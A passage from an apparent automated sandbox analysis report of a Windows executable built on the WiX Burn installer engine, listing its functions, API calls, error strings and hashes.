                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                  • String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
                                                                                                                                                                  • API String ID: 3459693003-1494111247
                                                                                                                                                                  • Opcode ID: 407fdb44810c0593d5e268efd48d4ed401eaa3bcc7430ccc17ddb9f6447a5e6f
                                                                                                                                                                  • Instruction ID: eadcb31429d68a8d146eff486bef501848f6c7260ab42132b045b13f46b85f39
                                                                                                                                                                  • Opcode Fuzzy Hash: 407fdb44810c0593d5e268efd48d4ed401eaa3bcc7430ccc17ddb9f6447a5e6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 5121AA76A41228BBD7219B958C0BF9F7AACEB91B94F014055FE04BB291E6709E40D6D0
                                                                                                                                                                  Function 009731AD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0097343B: FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
                                                                                                                                                                    • Part of subcall function 0097343B: FindClose.KERNEL32(00000000), ref: 00973482
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(0094E626,00000080,00000000,0094E626,000000FF,00000000,00000000,?,?,0094E626), ref: 009731E0
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0094E626), ref: 009731EA
                                                                                                                                                                  • DeleteFileW.KERNEL32(0094E626,00000000,0094E626,000000FF,00000000,00000000,?,?,0094E626), ref: 00973223
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0094E626), ref: 0097322D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                  • String ID: Failed to delete file: %ls$Failed to remove attributes from file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 3967264933-3778428042
                                                                                                                                                                  • Opcode ID: 416a32c36badf409648dc4a325e578ca645abae870e41b28eba3c0d48cd7179d
                                                                                                                                                                  • Instruction ID: a953f9e9f0aa490fa0eeaba558dcb63dc3d1bd7f50b49fe0ad093b2a6ffbf983
                                                                                                                                                                  • Opcode Fuzzy Hash: 416a32c36badf409648dc4a325e578ca645abae870e41b28eba3c0d48cd7179d
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F11D373B45329B3D33152699C4AFAFA95C9F85BA4F01C210FD2DB61D29660CE00A5F0
                                                                                                                                                                  Function 00971B2C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 67libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 00971B7E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00971D45,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00971B8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                  • String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                  • API String ID: 199729137-1104870970
                                                                                                                                                                  • Opcode ID: 238bdbe07f148c4782af0bf99afe1a35ff0a10700e26080f672473a3d0d531f5
                                                                                                                                                                  • Instruction ID: 839a65bd9e41f6f40b8aa21cadaf23d711c44ebe96997ddd649150c0700a865f
                                                                                                                                                                  • Opcode Fuzzy Hash: 238bdbe07f148c4782af0bf99afe1a35ff0a10700e26080f672473a3d0d531f5
                                                                                                                                                                  • Instruction Fuzzy Hash: 60113673B9233173D335125C6C0AF676AC89BC6BA4F128629BD09BF2E5F2E44C8151D0
                                                                                                                                                                  Function 0096E087 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0096E0B5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00916FBB,00000001,?,?,Function_000069E0,?), ref: 0096E0C4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                  • String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
                                                                                                                                                                  • API String ID: 1866314245-3391705418
                                                                                                                                                                  • Opcode ID: 78b0309cd36bc0f55c50193538d07103abb68af7e19b6050437ff3de0477da1c
                                                                                                                                                                  • Instruction ID: 33db53c802c9d90c447ffb897a36b6a5eb0e76fac15b01df74f2a477e336e906
                                                                                                                                                                  • Opcode Fuzzy Hash: 78b0309cd36bc0f55c50193538d07103abb68af7e19b6050437ff3de0477da1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A11C63AFC963973D33226589C0EB5A29189B93B64F070525FE047A6D1E5B19C80A1E1
                                                                                                                                                                  Function 0096B700 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 55libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00916DEA,00000000,?,00920CFC,00916DEE,00916DEA,?,0092066B,00917162,00917162,00916DEA,00000000,00917162,00000000), ref: 0096B711
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0096B718
                                                                                                                                                                  • GetLastError.KERNEL32(?,00920CFC,00916DEE,00916DEA,?,0092066B,00917162,00917162,00916DEA,00000000,00917162,00000000,00916DEA,00916CF2,00917162,00916DEA), ref: 0096B741
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
                                                                                                                                                                  • API String ID: 4275029093-2679686115
                                                                                                                                                                  • Opcode ID: da61520543bbb49b5b9ac506994adf7a3c18d9a4de3c91456eef135a484c1507
                                                                                                                                                                  • Instruction ID: 5c9d8612c46de5b9dcfa035b34cee7d6d0d2fafedadeffabd987c2d62ddace18
                                                                                                                                                                  • Opcode Fuzzy Hash: da61520543bbb49b5b9ac506994adf7a3c18d9a4de3c91456eef135a484c1507
                                                                                                                                                                  • Instruction Fuzzy Hash: 7301D87B65532977D32026549C89F5B695C9BC5760F020165FE19EB281F774CC8152E0
                                                                                                                                                                  Function 0096C8C3 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0096C8FF
                                                                                                                                                                  • GetProcAddress.KERNEL32(RegGetValueW), ref: 0096C915
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096C8E5
                                                                                                                                                                  • AdvApi32.dll, xrefs: 0096C8C9
                                                                                                                                                                  • RegDeleteKeyExW, xrefs: 0096C8F4
                                                                                                                                                                  • RegGetValueW, xrefs: 0096C905
                                                                                                                                                                  • Failed to load AdvApi32.dll, xrefs: 0096C8D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                  • String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 856020675-1672349681
                                                                                                                                                                  • Opcode ID: 36e1bd0b920fe55c94c7cb55653b77133c835add3ed5b4fd06da29bb33c7b3ab
                                                                                                                                                                  • Instruction ID: 212f611aaa4a0d08121dc3d06f97a9838637e64e849dd01f5044d5ad4902d9f2
                                                                                                                                                                  • Opcode Fuzzy Hash: 36e1bd0b920fe55c94c7cb55653b77133c835add3ed5b4fd06da29bb33c7b3ab
                                                                                                                                                                  • Instruction Fuzzy Hash: E3F04FF1AAF314AAE7145F35EC09B903A64AB57B59F050215F50E56AE0E7B04881EBC0
                                                                                                                                                                  Function 0092C6E8 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 0-338742995
                                                                                                                                                                  • Opcode ID: d69f9ab864f66961d99fc5448b18ef64ebf9e166f1d5393f1093e88ba3c31370
                                                                                                                                                                  • Instruction ID: 513786e323a010b1b53908de02f120e5b83187641436d92d79114fb1dc9d79bb
                                                                                                                                                                  • Opcode Fuzzy Hash: d69f9ab864f66961d99fc5448b18ef64ebf9e166f1d5393f1093e88ba3c31370
                                                                                                                                                                  • Instruction Fuzzy Hash: 7451C3B2D41229BBDB11DB98DC46FEFBAB8AF48710F114119F904BB291E7749D009BE1
                                                                                                                                                                  Function 00927CE9 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 126stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00916305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
                                                                                                                                                                    • Part of subcall function 00916305: GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 00927D78
                                                                                                                                                                    • Part of subcall function 00973EAD: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,?,00000000,?,00000000,?,00927D8F,?,00000080,?,00000000), ref: 00973EC5
                                                                                                                                                                    • Part of subcall function 00973EAD: GetLastError.KERNEL32(?,00000000,?,00927D8F,?,00000080,?,00000000,?,?,?,swidtag,?,?,?,?), ref: 00973ED2
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate regid file path., xrefs: 00927DEE
                                                                                                                                                                  • Failed to format tag folder path., xrefs: 00927E16
                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 00927E02
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00927DDF, 00927E28
                                                                                                                                                                  • swidtag, xrefs: 00927D34
                                                                                                                                                                  • Failed to write tag xml to file: %ls, xrefs: 00927DB6
                                                                                                                                                                  • Failed to create regid folder: %ls, xrefs: 00927DCD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorLast$DirectoryFilelstrlen
                                                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix4\wix4\src\burn\engine\registration.cpp$swidtag
                                                                                                                                                                  • API String ID: 583680227-1772413233
                                                                                                                                                                  • Opcode ID: 3a45829c1e6eeb899c8d52d00953c3f9fefbea250865497cf5a6f1b350c42b04
                                                                                                                                                                  • Instruction ID: 6da6369c37281047394282e4019bb34c9151e4e4e10a0e7ae2270762b9a7eafa
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a45829c1e6eeb899c8d52d00953c3f9fefbea250865497cf5a6f1b350c42b04
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C41F731E44628BBDB11AA94DC07FAFFA75EF44B10F618191B6107A2E0D7B15E509BA0
                                                                                                                                                                  Function 00918B6F Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,009185FC,00000000,?,00000000,?,00000000,?,0092A80F), ref: 00918B82
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,009185FC,00000000,?,00000000,?,00000000,?,0092A80F,?,00000001,00000000), ref: 00918C9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1256323647
                                                                                                                                                                  • Opcode ID: 529b1d9628f9477e70992e1bff56ff31d53d8555f751677567d0d60d1323ea53
                                                                                                                                                                  • Instruction ID: 0c80b5036e0ca7dff33c9876ffa8fdd7c8487177e5f1f2a247258db78d6613a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 529b1d9628f9477e70992e1bff56ff31d53d8555f751677567d0d60d1323ea53
                                                                                                                                                                  • Instruction Fuzzy Hash: 8031D672B4171DBBDF216F50CC46EDB7A68AB54750F004560FA04AA290DBB0AED0ABE0
                                                                                                                                                                  Function 0093D010 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0093D01D
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0093D095
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0093D0AC
                                                                                                                                                                    • Part of subcall function 0093CE40: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0093CD2A,?,00000060), ref: 0093CE7E
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0093D0C3
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D0D1
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0093D0D8
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D0EC
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0093D11C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$LongProc$MessagePost$Quit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3225497149-0
                                                                                                                                                                  • Opcode ID: be54e7ce6d7512204a599bc9af587bf9cd8dacf86905b6160d88829ae131654c
                                                                                                                                                                  • Instruction ID: 025ba0c4f2a419d200c645edaded479e3ebbddbcf1019a791f5a2b9c6f35d30a
                                                                                                                                                                  • Opcode Fuzzy Hash: be54e7ce6d7512204a599bc9af587bf9cd8dacf86905b6160d88829ae131654c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C31AF72109205BBDB299FB9AC68E6B7FBDEF89710F004A18F507961A1C7349911EF60
                                                                                                                                                                  Function 0095F9EB Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                  • Opcode ID: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                  • Instruction ID: 3a0adb69e55cc362166af2fa60cf88d20fba13610a4b8197cfafe6daede05904
                                                                                                                                                                  • Opcode Fuzzy Hash: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 2FB17A729003559FDB11CF25CCA1BAE7BA9EF55321F2441B5ED48AF282E3749909C7A0
                                                                                                                                                                  Function 009781C4 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 187COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00977F53,00000000,00000000,00978702,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 009781E8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get HTTP status code for request to URL: %ls, xrefs: 009783BE
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 009783CD
                                                                                                                                                                  • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00978381
                                                                                                                                                                  • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00978221
                                                                                                                                                                  • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 009781FF
                                                                                                                                                                  • Failed to get redirect url: %ls, xrefs: 009783AB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
